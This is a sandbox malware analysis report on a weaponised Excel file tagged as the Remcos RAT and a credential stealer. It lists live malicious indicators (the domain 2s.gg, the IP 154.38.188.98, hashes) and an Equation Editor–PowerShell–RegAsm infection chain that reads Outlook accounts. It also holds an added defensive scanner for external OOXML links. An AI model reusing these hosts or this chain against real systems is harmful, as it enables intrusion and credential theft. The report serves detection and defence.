Malware Analysis Report

2025-01-02 03:19

Sample ID 240326-s4zq5sdc96
Target Order request list.xls
SHA256 3ac1e9bc1c29e4f900a34d8e98672106887155015c3d868eb35b18a546f64af9
Tags
remcos remotehost collection rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3ac1e9bc1c29e4f900a34d8e98672106887155015c3d868eb35b18a546f64af9

Threat Level: Known bad

The file Order request list.xls was found to be: Known bad.

Malicious Activity Summary

remcos remotehost collection rat spyware stealer

Remcos

Nirsoft

NirSoft WebBrowserPassView

NirSoft MailPassView

Blocklisted process makes network request

Abuses OpenXML format to download file from external location

Reads user/profile data of web browsers

Accesses Microsoft Outlook accounts

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Checks processor information in registry

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Launches Equation Editor

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Suspicious behavior: AddClipboardFormatListener

Uses Volume Shadow Copy WMI provider

Enumerates system info in registry

Suspicious behavior: MapViewOfSection

Modifies registry class

MITRE ATT&CK

No Enterprise Matrix technique mappings are included in this copy of the report.

Analysis: static1

Detonation Overview

Reported

2024-03-26 15:41

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-26 15:41

Reported

2024-03-26 15:44

Platform

win10v2004-20240226-en

Max time kernel

144s

Max time network

136s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Order request list.xls"

Signatures

This Windows 10 / Office 2016 run did not reach the payload: there is no Equation Editor launch and no Remcos or NirSoft match, and every row below that names a process names EXCEL.EXE, WINWORD.EXE or the print-spooler helper splwow64.exe. Equation Editor (EQNEDT32.EXE) was removed from Office by the January 2018 updates, so a current Office 2016 image has nothing for that stage to launch. Excel did fetch the remote document (the .doc under INetCache\IE in the Files list) and WINWORD.EXE was started as an OLE server (-Embedding), but nothing further ran. Compare behavioral1, where the chain detonated.

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeAuditPrivilege | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Events (rows listed)
PID 3884 wrote to memory of 3464 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\splwow64.exe | 2

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Order request list.xls"

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" -Embedding

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 2s.gg | udp
FR | 13.105.221.26:80 | 2s.gg | tcp
FR | 13.105.221.26:443 | 2s.gg | tcp
US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.221.105.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 218.135.221.88.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp
US | 8.8.8.8:53 | g.bing.com | udp
US | 204.79.197.200:443 | g.bing.com | tcp
US | 154.38.188.98:80 | 154.38.188.98 | tcp
US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 98.188.38.154.in-addr.arpa | udp
US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 204.201.50.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp
US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp

The in-addr.arpa rows are reverse (PTR) lookups of contacted IPs (98.188.38.154.in-addr.arpa is the reverse of 154.38.188.98, 26.221.105.13.in-addr.arpa of 13.105.221.26), and the Bing rows are Office background traffic. Apart from those, this run resolved and connected to 2s.gg (13.105.221.26:80 and :443) and connected to 154.38.188.98:80 directly by IP; the report does not record which of these served the .doc found in the IE cache.

Files

memory/3024-2-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-3-0x00007FFEB04B0000-0x00007FFEB04C0000-memory.dmp

memory/3024-1-0x00007FFEB04B0000-0x00007FFEB04C0000-memory.dmp

memory/3024-0-0x00007FFEB04B0000-0x00007FFEB04C0000-memory.dmp

memory/3024-5-0x00007FFEB04B0000-0x00007FFEB04C0000-memory.dmp

memory/3024-6-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-7-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-4-0x00007FFEB04B0000-0x00007FFEB04C0000-memory.dmp

memory/3024-8-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-9-0x00007FFEADEA0000-0x00007FFEADEB0000-memory.dmp

memory/3024-10-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-12-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-11-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-13-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-14-0x00007FFEADEA0000-0x00007FFEADEB0000-memory.dmp

memory/3024-15-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-16-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-17-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-18-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-19-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-20-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-21-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-22-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-26-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-45-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-48-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-49-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-50-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-51-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-52-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-54-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-55-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-57-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-58-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-59-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-60-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-62-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-63-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\ECA74084-DAEC-4D17-8250-DECFD9EADE13

MD5 fa56eb7425da9458f604484bf1d9a41c
SHA1 91b3c85210114ef1dde2ddbdecaba72099260181
SHA256 aca644b9e5b31c6d97d8e2b06a31b41cee485e81c0218ea7afe7b39852bcb83e
SHA512 320abd9789fa25c535301000e3014ec656e892d46eec01595d510d4e812507eb98f35b339cda83f058cbb9d6b6f495f199e6576c90da60ca20888712aa3ce790

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

MD5 4a7227f9c12dd0ef0bbb96c0497bbe3c
SHA1 4b1c7b0b2563916c4f6db17e0bb8d150b2ebf66f
SHA256 340cbcdd0f2590570ad87dbc82d84e477f3d27deae1b16f5815df9a7410ce121
SHA512 0097718d817ff1e7adb1d0e113ea30c2b02aa3af8bbbc4a87de9e540b209883754da0acd07d48d4b368faedfa49c57aa053a7dde464e0aba81253b028491b758

memory/3884-65-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-66-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

MD5 4306c238aaa13d7442227922e4d31f87
SHA1 1827e8f5d94e78efb120c44549950346edd1e1ee
SHA256 9e4d66939f6e667f48a0461d9a545cdba62e1eec13eb8732d8e7c2bf28dadb5e
SHA512 58b2dba07ca036a422e786ce66710459f66fc23d756bd9f0c4c69709d9ccf7e3168c5e4b5265ea2eddd56389c9123510e7c0641c2ca33973fc85e748c89fbdd8

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\K4KS10IH\kissinggreatwaytounderstandhowimkissingherwithlotofhearttounderstandyouaremygirliloveu_____sweethearttounderstandkissingmygirl[1].doc

MD5 338da1470f51aa8116271555ee990e96
SHA1 0e1cb790e5bc6534c8757794512a8394a1f12d13
SHA256 c02d7beb9210e4edc9fad4c7de3a6827994343e249d3f7544632d8f64847dc74
SHA512 00a79d3fb886066e5f701386e445457fa489b2a63083b75a2d8ae05965cdd21ac7a11dd5267950da882b4bd89d44860506cd650b57e138d96fff353b33919039

memory/3024-86-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-87-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-88-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-26 15:41

Reported

2024-03-26 15:44

Platform

win7-20240221-en

Max time kernel

149s

Max time network

131s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Order request list.xls"

Signatures

Only this Windows 7 / Office 2010 run reached the payload. The WriteProcessMemory rows below record EQNEDT32.EXE (PID 2232) writing into WScript.exe (PID 1680), which in turn writes into powershell.exe (PID 2320); the Outlook account read and the SeDebugPrivilege use are attributed to RegAsm.exe. Separately, WINWORD.EXE (PID 624) also ran, and the long "Modifies Internet Explorer settings" and "Modifies registry class" tables below are Office 2010 re-registering its own HTML/MHTML file associations (they point at Office binaries such as msohtmed.exe and msohevi.dll), not attacker persistence.

Remcos

rat remcos

NirSoft MailPassView

Description | Indicator | Process | Target
(3 rows, all fields N/A: the rule matched but no indicator or process was recorded)

NirSoft WebBrowserPassView

Description | Indicator | Process | Target
(3 rows, all fields N/A: the rule matched but no indicator or process was recorded)

Nirsoft

Description | Indicator | Process | Target
(9 rows, all fields N/A: the rule matched but no indicator or process was recorded)

Abuses OpenXML format to download file from external location
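
This signature fires when Office fetches a file referenced from inside the document. The report does not show the sample's internals, so the scanner below, an added example that is not part of the report or of the sandbox's own logic, checks the static side of that behaviour on a constructed OOXML package: any relationship part with TargetMode="External" and a remote scheme, which is what Office resolves over the network when the document opens. The package contents, the part names and the template URL under example.invalid are assumptions made for the demonstration. The sample's .xls name is also a reminder that a legacy CFB workbook or an RTF file is not a zip; the check reports that instead of returning an empty result.

```python
"""Static counterpart of the signature 'Abuses OpenXML format to download file from
external location': list every relationship in an OOXML package (docx/xlsx/pptx) that
has TargetMode="External" and a remote scheme, since those are the links Office will
resolve over the network when the document is opened.

Added example, not part of the report. The report does not show the sample's internals,
so the package below is constructed in memory only to exercise the scanner.
"""
from __future__ import annotations

import io
import zipfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from urllib.parse import urlsplit

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REMOTE_SCHEMES = {"http", "https", "ftp", "file"}  # schemes that make Office fetch from elsewhere


@dataclass(frozen=True)
class ExternalRel:
    part: str      # the .rels part that declares the relationship
    rel_type: str  # last segment of the relationship Type, e.g. attachedTemplate, oleObject
    target: str    # the external target exactly as written in the package


def find_external_relationships(package: bytes) -> list[ExternalRel]:
    """Scan every *.rels part of an OOXML zip for external, remote-scheme relationships."""
    blob = io.BytesIO(package)
    if not zipfile.is_zipfile(blob):
        # A legacy CFB .xls or an RTF file is not a zip and needs a different parser;
        # say so rather than silently reporting nothing.
        raise ValueError("not an OOXML (zip) package")
    blob.seek(0)
    found: list[ExternalRel] = []
    with zipfile.ZipFile(blob) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # a malformed .rels part deserves its own look, but not this check's job
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                if urlsplit(target).scheme.lower() in REMOTE_SCHEMES:
                    rel_type = rel.get("Type", "").rstrip("/").rsplit("/", 1)[-1]
                    found.append(ExternalRel(name, rel_type, target))
    return found


def build_sample_package() -> bytes:
    """Constructed input: a docx skeleton whose settings part attaches a remote template."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://templates.example.invalid/order.dotm" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", f'<Relationships xmlns="{RELS_NS}"/>')
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in find_external_relationships(build_sample_package()):
        print(f"{hit.part}: {hit.rel_type} -> {hit.target}")
```

Internal relationships (relative targets such as styles.xml) are ignored on purpose; only links that leave the package are reported, together with the part that declares them, so the analyst can tell a remote template from a remote OLE object or hyperlink.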

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Launches Equation Editor

exploit

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A

Modifies Internet Explorer settings

adware spyware

Description | Indicator | Process | Target
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
